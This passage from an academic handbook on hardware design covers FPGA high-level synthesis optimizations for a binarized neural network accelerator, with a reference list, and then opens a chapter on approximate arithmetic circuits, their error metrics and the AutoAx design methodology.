where $\mathrm{out}_n(x, y)$ denotes the value of pixel $(x, y)$ in the $n$th output feature map, $\mathrm{in}_m$ is the $m$th input feature map, and $w_{m,n}$ is the filter that convolves with input $\mathrm{in}_m$ and produces a partial sum of output $\mathrm{out}_n$. Figure 8 shows how a conv layer can
be described in a C loop nest.
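Figure 8 itself is not reproduced here; the following loop nest is a straightforward rendering of the equation above in C. The array bounds follow the text's notation, with the sizes used later in the experiments (M = 16, N = 32, K = 3, S = 9) filled in as an assumption.

```cpp
// A direct rendering of the conv-layer equation in a C loop nest, in the
// spirit of Fig. 8 (the figure is not reproduced; the sizes are assumed).
#define M 16            // input feature maps
#define N 32            // output feature maps
#define K 3             // filter size
#define S 9             // output feature map size
#define I (S + K - 1)   // input feature map size for a "valid" convolution

void conv(const int in[M][I][I], const int w[M][N][K][K], int out[N][S][S]) {
  for (int n = 0; n < N; ++n)
    for (int y = 0; y < S; ++y)
      for (int x = 0; x < S; ++x) {
        int acc = 0;
        for (int m = 0; m < M; ++m)       // reduce over input feature maps
          for (int r = 0; r < K; ++r)     // filter rows
            for (int c = 0; c < K; ++c)   // filter columns
              acc += in[m][y + r][x + c] * w[m][n][r][c];
        out[n][y][x] = acc;
      }
}
```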
The main advantage of binarization is that one can replace the expensive multiplications with cheap bitwise logic operations. Figure 9 shows how one can encode the binarized variables so that their multiplication reduces to an XNOR operation.
Fig. 9 The encoding and multiplication for binarized variables. (a) Normal multiplication
between binarized variables x and y. (b) Binary multiplication using XNOR with encoded
variables x̂ and ŷ
$$A \cdot B = \sum_{i=0}^{L-1} A_i \times B_i = 2 \sum_{i=0}^{L-1} \mathrm{XNOR}(\hat{A}_i, \hat{B}_i) - L, \qquad (2)$$
Here A and B are two vectors with the same length L (i.e., |A| = |B| = L), Ai and Bi are binarized values that are either +1 or −1, and Âi and B̂i are the encoded values for Ai and Bi according to Fig. 9. The summation (Σ) in Equation (2) requires an integer addition. A more concrete example is shown below, where the entire dot product is multiplierless.
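The chapter's original worked example is not reproduced in the text; the following hypothetical sketch (plain C++, using the GCC/Clang popcount builtin) shows the same multiplierless computation for L = 8, directly following Equation (2).

```cpp
// Multiplierless binarized dot product for L = 8, following Equation (2):
// bit i of a_hat/b_hat encodes +1 as 1 and -1 as 0, XNOR marks matching
// positions, and a popcount replaces the summation.
int binary_dot(unsigned char a_hat, unsigned char b_hat) {
  const int L = 8;
  unsigned char x = ~(a_hat ^ b_hat);   // XNOR, truncated to 8 bits
  int pop = __builtin_popcount(x);      // GCC/Clang builtin
  return 2 * pop - L;                   // Equation (2)
}
// Example: binary_dot(0xFF, 0xFF) == 8 (all +1), binary_dot(0xFF, 0x00) == -8.
```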
Pipelining and Unrolling

Fig. 10 Sources of parallelism within a convolution layer. (a) Parallelism across filter pixels. (b)
Parallelism across input feature maps. (c) Parallelism across output feature maps. (d) Parallelism
across output pixels
Fig. 11 BNN code snippet with loop pipelining, unrolling, and fusion
A similar issue also exists for w. To overcome the port limitation, one needs to
perform memory optimizations, which the authors discuss in the next section.
Data Vectorization
The next optimization one can perform is data vectorization, which packs the
binarized values into long-bitwidth integers. The vectorized data can then be
read/written in a single memory transaction, which greatly improves the bandwidth
utilization and the overall operational intensity. To realize data vectorization in
HLS, arbitrary-precision data types are essential to describe the packed data (e.g.,
ap_(u)int for Xilinx HLS and ac_(u)int for Intel HLS).
Similar to pipelining and unrolling, data vectorization exploits another source
of parallelism in a conv layer. In this case study, the authors choose to vectorize
along the input feature maps (i.e., Fig. 10b) since it works well with the pipelining
and unrolling scheme. After vectorization, the dot products become popcount
operations. Figure 12 shows the algorithm after applying bit packing. Note that after
vectorization, loop m does not exist within the fused pipelined loop anymore.
Evaluation
Fig. 13 Optimized BNN codes in different programming languages. (a) HeteroCL. (b) HLS
The authors evaluate the design by applying each optimization cumulatively. For this specific design, the lower latency leads to a higher throughput. In the experiments, the authors select M = 16, N = 32, S = 9,
K = 3. The target device and clock period are Xilinx Zynq and 10 ns, respectively.
Table 2 shows the final results. Compared to HLS C/C++, the programmer can carry
out most optimization steps in HeteroCL by simply applying different customization
primitives without modifying the algorithm, which is usually a more productive and
less error-prone process.
From the table, one can see that pipelining and unrolling can effectively reduce
the latency, while also increasing the resource usage. Moreover, the achieved II
is only five because of the resource contention, which becomes the performance
bottleneck. To resolve this, reuse buffers (i.e., line buffers and window buffers) are introduced, after which II = 1 can be achieved, providing another 5.0× speedup as
expected. Finally, with bit packing, the authors achieve another 15.9× speedup
since the authors exploit the parallelism across the input feature maps (i.e., the
authors pack M = 16 bits into a single integer). To sum up, the authors achieve
around 592× speedup over the baseline design while using approximately 4× more
resources.
Concluding Remarks
This chapter surveys popular FPGA HLS compilers and discusses the key opti-
mizations in these tools to improve the throughput of FPGA-based designs.
Such optimizations improve one or more of the performance factors: parallelism,
utilization, and clock frequency. The authors describe representative optimization
techniques in the literature in four major categories, including pipelining, paral-
lelization, memory customization, and datatype customization. The authors also
present a case study on an HLS-based BNN accelerator to show the impacts of
these techniques.
It is clear that the latest generation of FPGA-targeted compilers and program-
ming languages have made significant progress in making FPGAs more accessible
to software developers. As a result, FPGA programmers can now more produc-
tively implement various important hardware customization techniques to build
an efficient accelerator with high quality of results. Despite this encouraging
development, current FPGAs are not fully software programmable – at least
not in the conventional manner that works for microprocessors, even with the
introduction of HLS. It may still take hours or days to compile HLS-generated
RTL to bitstream due to the slow physical design steps. Clearly, there remains
a host of challenges and opportunities for FPGA-specific compilers to compile a
high-level software specification to bitstream within minutes, and with significantly
less manual effort involved. To this end, the authors believe that physical-aware HLS
(Guo et al. 2020, 2021) and bottom-up modular place-and-route will be crucial to
enable a much faster FPGA design closure. The authors also believe that domain-
specific overlay architectures (Abdelfattah et al. 2018; Ma et al. 2019) will play an
increasingly important role in providing a programming experience that resembles
software development. Furthermore, integration with the high-level software stack
is necessary in order to increase adoption of FPGAs by software programmers.
References
Aamodt TM, Chow P (2008) Compile-time and instruction-set methods for improving floating-
to fixed-point conversion accuracy. In: ACM transactions in embedded computing systems
(TECS)
Abadi M, Barham P, Chen J, Chen Z, Davis A, Dean J, Devin M, Ghemawat S, Irving G, Isard M
et al (2016) TensorFlow: a system for large-scale machine learning. In: USENIX symposium on
operating systems design and implementation (OSDI)
Abdelfattah MS, Han D, Bitar A, DiCecco R, O’Connell S, Shanker N, Chu J, Prins I, Fender
J, Ling AC et al (2018) DLA: compiler and FPGA overlay for neural network inference
acceleration. In: International conference on field programmable logic and applications (FPL)
Bacon DF, Rabbah R, Shukla S (2013) FPGA programming for the masses. In: Communications
of the ACM
Bansal S, Hsiao H, Czajkowski T, Anderson JH (2018) High-level synthesis of software-
customizable floating-point cores. In: Design, automation, and test in Europe (DATE)
Bezati E, Emami M, Larus J (2020) Advanced dataflow programming using actor machines for
high-level synthesis. In: International symposium on field-programmable gate arrays (FPGA)
Canis A, Choi J, Aldham M, Zhang V, Kammoona A, Anderson JH, Brown S, Czajkowski T (2011)
LegUp: high-level synthesis for FPGA-based processor/accelerator systems. In: International
symposium on field-programmable gate arrays (FPGA)
Canis A, Anderson JH, Brown SD (2013) Multi-pumping for resource reduction in FPGA high-
level synthesis. In: Design, automation, and test in Europe (DATE)
Carlson T, Van Wyk E (2019) Building parallel programming language constructs in the AbleC
extensible C compiler framework: a PPoPP tutorial. In: ACM SIGPLAN conference on
principles and practice of parallel programming (PPoPP)
Carmichael Z, Langroudi HF, Khazanov C, Lillie J, Gustafson JL, Kudithipudi D (2019) Deep
positron: a deep neural network using the posit number system. In: Design, automation, and
test in Europe (DATE)
Chen T, Li M, Li Y, Lin M, Wang N, Wang M, Xiao T, Xu B, Zhang C, Zhang Z (2015) MXNet:
a flexible and efficient machine learning library for heterogeneous distributed systems. arXiv
preprint arXiv:1512.01274
Chen T, Moreau T, Jiang Z, Zheng L, Yan E, Shen H, Cowan M, Wang L, Hu Y, Ceze L et al
(2018) TVM: an automated end-to-end optimizing compiler for deep learning. In: USENIX
symposium on operating systems design and implementation (OSDI)
Cheng J, Josipovic L, Constantinides GA, Ienne P, Wickerson J (2020) Combining dynamic &
static scheduling in high-level synthesis. In: International symposium on field-programmable
gate arrays (FPGA)
Cherubin S, Cattaneo D, Chiari M, Di Bello A, Agosta G (2019) TAFFO: tuning assistant for
floating to fixed point optimization. In: IEEE embedded systems letters
Chi Y, Cong J, Wei P, Zhou P (2018) SODA: stencil with optimized dataflow architecture. In:
International conference on computer-aided design (ICCAD)
Chi Y, Guo L, Choi Y-K, Wang J, Cong J (2020) Extending high-level synthesis for task-parallel
programs. arXiv preprint arXiv:2009.11389
Choi J, Brown S, Anderson J (2013) From software threads to parallel hardware in high-level
synthesis for FPGAs. In: International conference on field programmable technology (FPT)
Choi Y-K, Cong J, Fang Z, Hao Y, Reinman G, Wei P (2016) A quantitative analysis on
microarchitectures of modern CPU-FPGA platforms. In: Design automation conference (DAC)
Chugh N, Vasista V, Purini S, Bondhugula U (2016) A DSL compiler for accelerating image
processing pipelines on FPGAs. In: International conference on parallel architectures and
compilation
Cilardo A, Gallo L (2015) Improving multibank memory access parallelism with lattice-based
partitioning. In: ACM transactions on architecture and code optimization (TACO)
Cong J, Wang J (2018) PolySA: polyhedral-based systolic array auto-compilation. In: International
conference on computer-aided design (ICCAD)
Cong J, Liu B, Neuendorffer S, Noguera J, Vissers K, Zhang Z (2011) High-level synthesis for
FPGAs: from prototyping to deployment. In: IEEE transactions on computer-aided design of
integrated circuits and systems (TCAD)
Cong J, Wei P, Yu CH, Zhang P (2018) Automated accelerator generation and optimization with
composable, parallel and pipeline architecture. In: Design automation conference (DAC)
Courbariaux M, Hubara I, Soudry D, El-Yaniv R, Bengio Y (2016) Binarized neural networks:
training deep neural networks with weights and activations constrained to +1 or -1. arXiv
preprint arXiv:1602.02830
Coussy P, Chavet C, Bomel P, Heller D, Senn E, Martin E (2008) GAUT: a high-level synthesis
tool for DSP applications. Springer, Dordrecht
Dai S, Zhang Z (2019) Improving scalability of exact modulo scheduling with specialized conflict-
driven learning. In: Design automation conference (DAC)
Dai S, Zhao R, Liu G, Srinath S, Gupta U, Batten C, Zhang Z (2017) Dynamic hazard resolution
for pipelining irregular loops in high-level synthesis. In: International symposium on field-
programmable gate arrays (FPGA)
Dai S, Liu G, Zhang Z (2018) A scalable approach to exact resource-constrained scheduling based
on a joint SDC and SAT formulation. In: International symposium on field-programmable gate
arrays (FPGA)
de Fine Licht J, Besta M, Meierhans S, Hoefler T (2018) Transformations of high-level synthesis
codes for high-performance computing. arXiv preprint arXiv:1805.08288
Dennis JB (1974) First version of a data flow procedure language. In: Programming symposium
De Dinechin F, Pasca B (2011) Designing custom arithmetic data paths with FloPoCo. IEEE Des
Test Comput 28:18–27
Eker J, Janneck J (2003) CAL language report: specification of the CAL actor language. EECS
Department, University of California, Berkeley Technical Report
Fort B, Canis A, Choi J, Calagar N, Lian R, Hadjis S, Chen YT, Hall M, Syrowik B, Czajkowski
T et al (2014) Automating the design of processor/accelerator embedded systems with legup
high-level synthesis. In: International conference on embedded and ubiquitous computing
Gaide B, Gaitonde D, Ravishankar C, Bauer T (2019) Xilinx adaptive compute acceleration
platform: VersalTM architecture. In: International symposium on field-programmable gate
arrays (FPGA)
Kahn G (1974) The semantics of a simple language for parallel programming. In: Information processing
Gonzalez RE (2000) Xtensa: a configurable and extensible processor. IEEE Micro 20:60–70
Govindu G, Scrofano R, Prasanna VK (2005) A library of parameterizable floating-point cores
for FPGAs and their application to scientific computing. In: International conference on
engineering reconfigurable systems and algorithms
Guo L, Lau J, Chi Y, Wang J, Yu CH, Chen Z, Zhang Z, Cong J (2020) Analysis and optimization of
the implicit broadcasts in FPGA HLS to improve maximum frequency. In: Design automation
conference (DAC)
Guo L, Chi Y, Wang J, Lau J, Qiao W, Ustun E, Zhang Z, Cong J (2021) AutoBridge:
coupling coarse-grained floorplanning and pipelining for high-frequency HLS design on multi-
die FPGAs. In: International symposium on field-programmable gate arrays (FPGA)
Hadjis S, Olukotun K (2019) TensorFlow to cloud FPGAs: tradeoffs for accelerating deep neural
networks. In: International conference on field programmable logic and applications (FPL)
Hegarty J, Brunhaver J, DeVito Z, Ragan-Kelley J, Cohen N, Bell S, Vasilyev A, Horowitz M,
Hanrahan P (2014) Darkroom: compiling high-level image processing code into hardware
pipelines. ACM Trans Graph (TOG) 33:1–11
Hegarty J, Daly R, DeVito Z, Ragan-Kelley J, Horowitz M, Hanrahan P (2016) Rigel: flexible
multi-rate image processing hardware. In: ACM transactions on graphics (TOG)
Hsiao H, Anderson J (2019) Thread weaving: static resource scheduling for multithreaded high-
level synthesis. In: Design automation conference (DAC)
Hwang C-T, Lee J-H, Hsu Y-C (1991) A formal approach to the scheduling problem in high-level
synthesis. In: IEEE transactions on computer-aided design of integrated circuits and systems
(TCAD)
Ishikawa A, Fukushima N, Maruoka A, Iizuka T (2019) Halide and GENESIS for generating
domain-specific architecture of guided image filtering. In: International symposium on circuits
and systems (ISCAS)
Jaiswal MK, Cheung RCC (2013) Area-efficient architectures for double precision multiplier on
FPGA, with run-time-reconfigurable dual single precision support. Microelectron J 44:421–430
Janneck JW, Miller ID, Parlour DB, Roquier G, Wipliez M, Raulet M (2011) Synthesizing
hardware from dataflow programs. J Sig Process Syst 63:241–249
Jia Y, Shelhamer E, Donahue J, Karayev S, Long J, Girshick R, Guadarrama S, Darrell T (2014)
Caffe: convolutional architecture for fast feature embedding. In: International conference on
multimedia
Josipovic L, Brisk P, Ienne P (2017) From C to elastic circuits. In: Asilomar conference on signals,
systems, and computers
Josipović L, Ghosal R, Ienne P (2018) Dynamically scheduled high-level synthesis. In:
International symposium on field-programmable gate arrays (FPGA)
Josipovic L, Guerrieri A, Ienne P (2019) Speculative dataflow circuits. In: International symposium
on field-programmable gate arrays (FPGA)
Kato Y, Seto K (2013) Loop fusion with outer loop shifting for high-level synthesis. In: IPSJ
transactions on system LSI design methodology
King M, Dave N (2012) Automatic generation of hardware/software interfaces. In: ACM
SIGARCH computer architecture news
Koeplinger D, Prabhakar R, Zhang Y, Delimitrou C, Kozyrakis C, Olukotun K (2016) Automatic
generation of efficient accelerators for reconfigurable hardware. In: International symposium
on computer architecture (ISCA)
Koeplinger D, Feldman M, Prabhakar R, Zhang Y, Hadjis S, Fiszel R, Zhao T, Nardi L, Pedram
A, Kozyrakis C et al (2018) Spatial: a language and compiler for application accelerators. In:
ACM SIGPLAN conference on programming language design and implementation (PLDI)
Kung H-T (1982) Why systolic architectures? IEEE Comput 15:37–46
LaForest CE, Steffan JG (2010) Efficient multi-ported memories for FPGAs. In: International
symposium on field-programmable gate arrays (FPGA)
Lai Y-H, Chi Y, Hu Y, Wang J, Yu CH, Zhou Y, Cong J, Zhang Z (2019) HeteroCL: a multi-
paradigm programming infrastructure for software-defined reconfigurable computing. In:
International symposium on field-programmable gate arrays (FPGA)
Lai Y-H, Rong H, Zheng S, Zhang W, Cui X, Jia Y, Wang J, Sullivan B, Zhang Z, Liang Y et al
(2020) SuSy: a programming model for productive construction of high-performance systolic
arrays on FPGAs. In: International conference on computer-aided design (ICCAD)
Lee EA, Messerschmitt DG (1987) Synchronous data flow. In: Proceedings of the IEEE
Lee H, Brown K, Sujeeth A, Chafi H, Rompf T, Odersky M, Olukotun K (2011) Implementing
domain-specific languages for heterogeneous parallel computing. In: IEEE Micro
Liao S-W, Kuang S-Y, Kao C-L, Tu C-H (2019) A halide-based synergistic computing framework
for heterogeneous systems. J Sig Process Syst 91:219–233
Li J, Chi Y, Cong J (2020) HeteroHalide: from image processing DSL to efficient FPGA
acceleration. In: International symposium on field-programmable gate arrays (FPGA)
Lindtjorn O, Clapp R, Pell O, Fu H, Flynn M, Mencer O (2011) Beyond traditional microproces-
sors for geoscience high-performance computing applications. In: IEEE Micro
Liu J, Wickerson J, Constantinides GA (2016) Loop splitting for efficient pipelining in high-level
synthesis. In: IEEE symposium on field programmable custom computing machines (FCCM)
Ma R, Hsu J-C, Tan T, Nurvitadhi E, Sheffield D, Pelt R, Langhammer M, Sim J, Dasu A, Chiou
D (2019) Specializing FGPU for persistent deep learning. In: International conference on field
programmable logic and applications (FPL)
Meeuws R, Galuzzi C, Bertels K (2011) High level quantitative hardware prediction modeling
using statistical methods. In: International conference on embedded computer systems:
architectures, modeling and simulation
Menard D, Chillet D, Sentieys O (2006) Floating-to-fixed-point conversion for digital signal
processors. EURASIP J Adv Sig Process
Meng C, Yin S, Ouyang P, Liu L, Wei S (2015) Efficient memory partitioning for parallel data
access in multidimensional arrays. In: Design automation conference (DAC)
Merlin Compiler (2020) Falcon Computing Solutions. https://github.com/falconcomputing/
merlin-compiler
Moreau T, Chen T, Jiang Z, Ceze L, Guestrin C, Krishnamurthy A (2018) VTA: an open hardware-
software stack for deep learning. arXiv preprint arXiv:1807.04188
Mullapudi RT, Vasista V, Bondhugula U (2015) Polymage: automatic optimization for image
processing pipelines. ACM SIGARCH Comput Archit News 43:429–443
Najjar WA, Villarreal J, Halstead RJ (2016) ROCCC 2.0. In: FPGAs for software programmers
Nane R, Sima VM, Quoc CP, Goncalves F, Bertels K (2014) High-level synthesis in the Delft
workbench hardware/software co-design tool-chain. In: International conference on embedded
and ubiquitous computing
Nigam R, Atapattu S, Thomas S, Li Z, Bauer T, Ye Y, Koti A, Sampson A, Zhang Z (2020)
Predictable accelerator design with time-sensitive affine types. In: ACM SIGPLAN conference
on programming language design and implementation (PLDI)
Ostadzadeh SA, Meeuws RJ, Galuzzi C, Bertels K (2010) Quad–a memory access pattern analyser.
In: International symposium on applied reconfigurable computing
Papakonstantinou A, Gururaj K, Stratton JA, Chen D, Cong J, Hwu W-MW (2009) FCUDA:
enabling efficient compilation of CUDA kernels onto FPGAs. In: Symposium on application
specific processors (SASP)
Paszke A, Gross S, Massa F, Lerer A, Bradbury J, Chanan G, Killeen T, Lin Z, Gimelshein N,
Antiga L et al (2019) Pytorch: an imperative style, high-performance deep learning library.
arXiv preprint arXiv:1912.01703
Peverelli F, Rabozzi M, Del Sozzo E, Santambrogio MD (2018) OXiGen: a tool for automatic
acceleration of C functions into dataflow FPGA-based kernels. In: International parallel and
distributed processing symposium on workshop (IPDPSW)
Pilato C, Ferrandi F (2013) Bambu: a modular framework for the high-level synthesis of
memory-intensive applications. In: International conference on field programmable logic and
applications (FPL)
Pouchet L-N, Zhang P, Sadayappan P, Cong J (2013) Polyhedral-based data reuse optimization
for configurable computing. In: International symposium on field-programmable gate arrays
(FPGA)
Pu J, Bell S, Yang X, Setter J, Richardson S, Ragan-Kelley J, Horowitz M (2017) Programming
heterogeneous systems from an image processing DSL. ACM Trans Archit Code Optim (TACO)
14:1–25
Putnam A, Bennett D, Dellinger E, Mason J, Sundararajan P, Eggers S (2008) CHiMPS: a c-level
compilation flow for hybrid CPU-FPGA architectures. In: International conference on field
programmable logic and applications (FPL)
Contents
Approximate Computing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1028
Approximate Arithmetic Components . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1030
Design Methodologies for Approximate Components . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1030
Error Metrics and Evaluation Analysis for Approximate Components . . . . . . . . . . . . . . . 1034
Design Methods for Building Approximate Hardware Accelerators: Case
Studies for Error-Tolerant Applications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1037
Image and Video Processing Applications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1038
Deep Neural Networks (DNNs) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1046
Cross-Layer Approximations for Error-Tolerant Applications . . . . . . . . . . . . . . . . . . . . . . . . 1052
Methodology for Combining Hardware- and Software-Level Approximations . . . . . . . . 1052
Cross-Layer Methodology for Optimizing DNNs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1054
Case Studies for Improving the Energy and Performance Efficiency of DNN Inference . . . 1055
Structured Pruning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1055
Quantization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1057
Hardware-Level Approximations: Impact of Self-Healing and
Nonself-Healing Designs on DNN Accuracy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1058
Conclusions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1063
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1064
Abstract
Keywords
Approximate Computing

Fig. 1 Overview of the approximations covered in this chapter: hardware-level approximations (approximate arithmetic components in the MAC units of a processing-element array, drawn from a library of approximate components), software-level approximations (pruning and bitwidth reduction), and cross-layer approximations that combine both
The chapter first describes the design and evaluation of approximate arithmetic modules (e.g., adders and multipliers). Then section “Design Methods for Building Approximate Hardware Accelerators: Case Studies for Error-Tolerant Applications” presents design methodologies for automatically generating approximate datapaths for application-specific systems. Section “Cross-Layer Approximations for Error-Tolerant Applications” presents a cross-layer design flow that integrates software-
level and hardware-level approximations. Toward the end, section “Case Studies for
Improving the Energy and Performance Efficiency of DNN Inference” highlights
the effectiveness of cross-layer approximations for deep learning applications, and
section “Conclusions” concludes the chapter.
Approximate Arithmetic Components

This work focuses on approximate arithmetic circuits because they are frequently
used in the key applications relevant for approximate computing. The methods for
functional approximations can be divided into two categories: (1) manual and (2)
automated.
The manual (ad hoc) methods are developed for a specific circuit component.
In this chapter, examples of manual approximation of two key arithmetic circuits
– adders and multipliers – are described. These circuits are widely approximated
because they realize key operations in applications requiring low-power processing.
MACs, although widely employed, are typically approximated by using separate
multiplier and adder units instead of introducing an error to the complex MAC
circuit, and thus these circuits are not discussed in the chapter. Designers of
manually approximated circuits identify regularities in the design and modify the structure or the truth table of the circuit (Fig. 2a). On the other hand, automated
methods use general-purpose circuit resynthesis and approximation techniques and
enable approximation of arbitrary circuits. These methods start with an original
(exact) circuit and, typically iteratively, modify its structure as shown in Fig. 2.
Fig. 2 Examples of two possible approaches to the approximation of a multiplier: (a) manual, where a designer found rules for effectively omitting cells (Mahdiani et al. 2010), and (b) automated iterative approximation of a multiplier having the best area (A) and a worst-case error (WCE) below 5%
Adders: An adder performs the addition of two binary numbers. Two basic implementations are (1) the ripple-carry adder (RCA), where the carry of each full adder is propagated to the next full adder, and (2) the carry-lookahead adder (CLA), where several units working in parallel generate three signals (“sum,” “propagate,” and “generate”) that are used to quickly derive the carry-in signals. The CLA has a significantly shorter delay than the RCA; however, its area and power dissipation are larger. Many approximation principles for adders implemented using one of these two schemes have been proposed in the literature and can be grouped into several classes (Jiang et al. 2017).
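As a concrete example of such a manual approximation, the sketch below models a lower-part OR adder in the spirit of Mahdiani et al. (2010): the k low-order bits are “added” by a bitwise OR with no carry chain, and only the upper bits use exact addition. This simplified Python model (illustrative, not from the chapter) also drops the carry normally generated from the lower part into the upper part:

def lower_or_adder(a: int, b: int, k: int, width: int = 8) -> int:
    lo_mask = (1 << k) - 1
    lo = (a | b) & lo_mask                    # approximate lower part (OR)
    hi = ((a >> k) + (b >> k)) << k           # exact upper part, carry-in dropped
    return (lo | hi) & ((1 << (width + 1)) - 1)

print(lower_or_adder(5, 3, k=4), "vs. exact", 5 + 3)   # prints 7 vs. exact 8

Because the OR never produces a carry, the result underestimates the sum only when both lower parts have overlapping set bits, which keeps the error small for typical operand distributions.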
In automated methods based on don’t cares, candidate don’t care states are derived such that the error constraint is not violated. The don’t care states are iteratively applied to the approximate solution and are accepted if the output of the virtual (error-checking) circuit remains zero for all input combinations. Thereafter, a traditional don’t care-based optimization technique is applied.
Error metrics quantify the difference between a correct design and an approximate design. These metrics are divided into two categories: arithmetic error metrics, which compare the integer values of the circuit outputs, and Boolean error metrics, which are classified as general errors.
The relative error is frequently employed to constrain the approximate circuit to differ from the correct one by at most a certain margin. Note that special care must be devoted to the cases in which the output value of the original circuit equals zero, i.e., the cases when the denominator becomes zero. This issue can be addressed either by omitting test cases for which int(f(x)) = 0 or by biasing the denominator by 1. The first approach is usually employed in manual approximation methods, where the zero results are kept accurate (Jiang et al. 2017).
The average-case arithmetic error (also known as MAE) is defined as the sum
of absolute differences in magnitude between the original and approximate circuit,
averaged over all inputs:
$$e_{mae}(f, \hat{f}) = 2^{-n} \sum_{\forall x \in B^n} \left| int(f(x)) - int(\hat{f}(x)) \right| \qquad (3)$$
If the expression in the sum is replaced by the equation for relative error distance,
the mean relative error is calculated:
$$e_{mre}(f, \hat{f}) = 2^{-n} \sum_{\forall x \in B^n} \frac{\left| int(f(x)) - int(\hat{f}(x)) \right|}{int(f(x))} \qquad (4)$$
Note that the values produced by the absolute error metrics e_mae and e_wce can be very large. Hence, these values can be expressed as a fraction of the output range by dividing them by 2^m − 1, i.e., the maximal output value. For example, a worst-case arithmetic error of 64 for a circuit with an 8-bit output (e.g., a 4-bit multiplier) is equal to a 25% error.
In many cases, it is also worth considering the Hamming distance between f(x) and f̂(x). The worst-case Hamming distance, also denoted as the bit-flip error (Chen et al. 2014), is defined as
$$e_{bf}(f, \hat{f}) = \max_{\forall x \in B^n} \sum_{i=1}^{m} \left( f(x) \oplus \hat{f}(x) \right)_i \qquad (6)$$
and gives the maximum number of output bits that simultaneously output a wrong
value. The average number of changed output bits, denoted as the average Hamming
distance, can be expressed as follows:
$$e_{mhd}(f, \hat{f}) = 2^{-n} \sum_{\forall x \in B^n} \sum_{i=1}^{m} \left( f(x) \oplus \hat{f}(x) \right)_i \qquad (7)$$
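To make these definitions concrete, the following minimal Python sketch (not from the chapter) evaluates the metrics exhaustively for a toy 4-bit multiplier with an illustrative approximation that zeroes the two least significant product bits; here n is the total number of input bits (8) and m the number of output bits (8):

from itertools import product

N = 4                       # operand width; n = 2*N input bits, m = 2*N output bits

def exact_mult(a, b):
    return a * b

def approx_mult(a, b):
    return (a * b) & ~0b11  # illustrative: zero the two least significant bits

def error_metrics(f, f_hat, n_bits=N, m=2 * N):
    inputs = list(product(range(2 ** n_bits), repeat=2))  # enumerates B^n
    abs_errs, rel_sum, hammings = [], 0.0, []
    for a, b in inputs:
        y, y_hat = f(a, b), f_hat(a, b)
        abs_errs.append(abs(y - y_hat))
        if y != 0:                      # zero-output cases omitted, cf. Eq. (4)
            rel_sum += abs(y - y_hat) / y
        hammings.append(bin(y ^ y_hat).count("1"))
    return {
        "e_mae": sum(abs_errs) / len(inputs),          # Eq. (3)
        "e_mre": rel_sum / len(inputs),                # Eq. (4)
        "e_wce": max(abs_errs),                        # worst-case arithmetic error
        "e_wce_rel": max(abs_errs) / (2 ** m - 1),     # scaled to the output range
        "e_bf": max(hammings),                         # Eq. (6)
        "e_mhd": sum(hammings) / len(inputs),          # Eq. (7)
    }

print(error_metrics(exact_mult, approx_mult))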
Quality Evaluation
The error-metric formulas require the enumeration of all possible input vectors. For a larger number of inputs n, it is not feasible to enumerate B^n. This issue can be addressed by (a) enumerating only a subset of B^n or (b) obtaining the exact value either by exhaustive simulation (with a maximal level of SIMD parallelization) (Hrbacek and Sekanina 2014; Mrazek et al. 2018) or by some formal verification technique. The formal techniques typically construct a virtual miter circuit (consisting of the candidate circuit, the golden solution, and a comparison circuit), which is then represented and analyzed using Reduced Ordered Binary Decision Diagrams (ROBDDs) or a SAT conjunctive normal form (CNF) encoding.
Fig. 3 Two types of accelerators: (a) an accelerator with the irregular structure of a fixed Gaussian filter, having ten adders and one subtractor with different levels of approximation, and (b) a PE array for neural network inference, where each PE employs the same adder and multiplier
Two major types of accelerators are discussed in the following sections. The first one maps every operation onto a dedicated hardware component (Fig. 3a). Typical examples of such irregular accelerators are image, video, or signal processing filter pipelines. The automated methodology shown in section “Image and Video Processing Applications” maps the approximate components to the operations. The second type of accelerator shares hardware components among multiple operations (Fig. 3b). Such sharing occurs, for example, in neural network inference acceleration: the layer operations are executed on a PE array where each processing element handles multiple different convolutions. In this case, additional constraints (e.g., only a few approximate PE arrays, the order of the layers) must be satisfied. However, the structure of the neural network may be modified simultaneously. The approximation of neural networks is discussed in section “Deep Neural Networks (DNNs)”.
AutoAx Methodology
To address the approximate component binding problem, the authors proposed the AutoAx methodology (Mrazek et al. 2019a), which enables fast estimation of the QoR and hardware cost of candidate configurations without synthesizing and simulating each of them.
Model Construction Since the synthesis and simulation are typically very time-
consuming processes, it is intractable to use them to perform the analysis of
hardware cost and QoR for every possible configuration of the accelerator. To address this issue, the construction of two independent computational models is proposed: one for estimating the QoR and a second for estimating the hardware parameters. The estimation is based on the parameters of the approximate circuits belonging to one selected configuration.
The models are constructed independently using a suitable supervised machine learning algorithm (a regression problem). The learning process is based on providing example input–output pairs. In our case, each input–output pair corresponds to a particular configuration, as shown in Fig. 5: the input is a vector X of parameters of the circuits employed in the configuration, and the output y is the corresponding QoR or hardware cost.
Fig. 5 Construction of the training/testing set for the ML model of hardware cost. The X-vector is extracted from the library (e.g., power and PDP [power–delay product] for HW cost; e_mae and e_wce for QoR), and the y-value is calculated using the synthesis chain
Model-Based Design Space Exploration In this step, the Pareto frontier contain-
ing those configurations that show the best trade-offs between QoR and hardware
cost is constructed. In order to avoid time-consuming simulation and synthesis, the
construction is divided into two stages. In the first stage, the computational models
that were developed in the previous step are used to build a pseudo-Pareto set of
potentially good configurations. In the second stage, based on the configurations
forming the pseudo-Pareto set, a set of approximate accelerators is determined, fully
synthesized, and analyzed by means of a simulator and benchmark data. A real QoR and a real hardware cost are assigned to each configuration. Finally, these real values are used to construct the final Pareto set.
